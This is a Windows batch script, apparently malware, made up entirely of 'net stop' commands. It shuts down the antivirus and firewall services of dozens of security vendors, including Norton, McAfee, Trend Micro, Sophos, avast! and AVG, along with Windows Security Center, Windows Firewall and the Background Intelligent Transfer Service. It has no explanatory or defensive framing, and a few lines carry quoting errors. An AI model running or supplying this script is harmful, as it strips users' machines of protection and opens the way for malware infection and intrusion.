@echo off
net stop "Turbo Vaccine Monitoring Service"
net stop "MonSvcNT"
net stop "rising process communication center"
net stop "rising realtime monitor service"
net stop "OfficeScanNT Monitor"
net stop "RemoteAgent"
net stop "Ahnlab Task Scheduler"
net stop "Panda Antivirus"
net stop "ZoneAlarm"
net stop "Detector de OfficeScanNT"
net stop "Symantec Proxy Service"
net stop "Symantec Event Manager"
net stop "Norton Internet Security Accounts Manager"
net stop "Norton Internet Security Proxy Srvice"
net stop "Norton Internet Security service"
net stop "Norton AntiVirus Server"
net stop "Norton AntiVirus Auto Protect Service"
net stop "Norton AntiVirus Client"
net stop "Norton AntiVirus Corporate Edition"
net stop "ViRobot Professional Monitoring"
net stop "PC-cillin Personal Firewall"
net stop "Trend Micro Proxy Service"
net stop "Trend NT Realtime Service"
net stop "Trend Micro Real-time Service"
net stop "Trend Micro Personal Firewall
net stop "Trend Micro Central Control Component""
net stop "McAfee.com McShield"
net stop "McAfee.com VirusScan Online Realtime Engine"
net stop "McAfee Agent"
net stop " McAfee SecurityCenter Update Manager "
net stop "McShield"
net stop "SyGateService"
net stop "Sygate Personal Firewall Pro"
net stop "Sygate Personal Firewall"
net stop "Sophos Anti-Virus"
net stop "Sophos Anti-Virus Network"
net stop "eTrust Antivirus Job Server"
net stop "eTrust Antivirus Realtime Server"
net stop "eTrust Antivirus RPC Server"
net stop "ViRobot Expert Monitoring"
net stop "ViRobot Lite Monitoring"
net stop "Quick Heal Online Protection"
net stop "V3MonNT"
net stop "V3MonSvc"
net stop "Security Center"
net stop "Windows Firewall"
net stop "Windows Internet Connection Sharing(ICS)"
net stop "NAV Alert"
net stop "NAV Auto-Protect"
net stop "ScriptBlocking Service"
net stop "DefWatch"
net stop "Background Intelligent Transfer Service"
net stop "System Event Notification"
net stop "BlackICE"
net stop "AVSync Manager"
net stop "AVG7 Alert Manager Server"
net stop "AVG7 Update Service"
net stop "InVircible Scheduler"
net stop "kavsvc"
net stop "avast! Antivirus"
net stop "avast! iAVS4 Control Service"
net stop "Trend ServerProtect Agent"
net stop "Trend ServerProtect "
net stop "AVG6 Service"